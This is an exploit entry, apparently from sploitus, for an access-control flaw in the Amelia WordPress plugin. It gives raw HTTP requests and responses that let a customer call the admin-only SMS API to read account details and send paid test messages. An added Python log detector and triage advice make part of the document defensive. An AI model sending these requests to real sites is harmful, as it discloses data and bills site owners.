## https://sploitus.com/exploit?id=WPEX-ID:0882E5C0-F319-4994-9346-AA18438FDA6A
To get the ameliaNonce, view the page source of the Amelia dashboard while logged in as a customer and look for "wpAmeliaNonce".

## Get User Info
```http
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 24

{"action":"getUserInfo"}
```

Response:

```json
{"message":"Amelia SMS API request successful","data":{"status":"OK","user":{"email":"redacted@gmail.com","balance":0}}}
```

## Get Payment History
```http
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 30

{"action":"getPaymentHistory"}
```

Response:

```json
{"message":"Amelia SMS API request successful","data":{"status":"OK","payments":[],"countFiltered":0}}
```

## Send test notification (costs real money)

```http
POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Cookie: [customer+]
Content-Type: application/json;charset=utf-8
Content-Length: 146

{
  "action":"testNotification",
  "data":{
    "type": "appointment",
    "notificationTemplate": 1,
    "recipientPhone":"11111111"
  }
}
```
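All three requests above share one observable: a POST to `admin-ajax.php` with `action=wpamelia_api` and `call=/notifications/sms`, which only an administrator should ever need. The detector below is an added example (not part of the sploitus entry or the plugin) that flags such calls in constructed combined-format access log lines and, where a WAF or audit log also records request bodies, classifies the JSON `action` so that a paid `testNotification` can be separated from the read-only calls; the sample log lines and IPs are constructed.

```python
import re
import json
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx "combined" format (not real traffic).
SAMPLE_LOG = """\
203.0.113.7 - - [10/Mar/2024:12:00:01 +0000] "POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1" 200 118 "-" "Mozilla/5.0"
203.0.113.7 - - [10/Mar/2024:12:00:03 +0000] "POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/notifications/sms&ameliaNonce=785ba17145 HTTP/1.1" 200 103 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Mar/2024:12:00:05 +0000] "POST /wp-admin/admin-ajax.php?action=wpamelia_api&call=/appointments&ameliaNonce=785ba17145 HTTP/1.1" 200 512 "-" "Mozilla/5.0"
198.51.100.2 - - [10/Mar/2024:12:00:09 +0000] "GET /wp-admin/admin-ajax.php?action=heartbeat HTTP/1.1" 200 54 "-" "Mozilla/5.0"
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Amelia API sub-paths that a customer-level session should never reach.
ADMIN_ONLY_CALLS = {"/notifications/sms"}

# Meaning of the JSON "action" values seen in the PoC, for body-aware logs.
BODY_ACTIONS = {
    "getUserInfo": "info disclosure",
    "getPaymentHistory": "info disclosure",
    "testNotification": "paid SMS sent",
}

def parse_line(line):
    """Split one combined-format line into ip, timestamp, path and decoded query dict."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    parts = urlsplit(rec["target"])
    rec["path"] = parts.path
    rec["query"] = {k: v[0] for k, v in parse_qs(parts.query).items()}
    return rec

def is_amelia_admin_call(rec):
    return (rec is not None
            and rec["path"].endswith("/wp-admin/admin-ajax.php")
            and rec["query"].get("action") == "wpamelia_api"
            and rec["query"].get("call") in ADMIN_ONLY_CALLS)

def find_suspicious(log_text):
    """Return (ip, timestamp, call) per hit so it can be correlated with the WP user session."""
    return [(r["ip"], r["ts"], r["query"]["call"])
            for r in map(parse_line, log_text.splitlines()) if is_amelia_admin_call(r)]

def classify_body(body):
    """Label a logged JSON request body by the Amelia action it carries."""
    try:
        action = json.loads(body).get("action")
    except (ValueError, AttributeError):
        return "unparsable"
    return BODY_ACTIONS.get(action, "unknown")
```

Hits from a session that is not an administrator are the signal; correlate the IP and timestamp with the WordPress login records, and treat a `testNotification` body as a billing event to reconcile against the SMS provider.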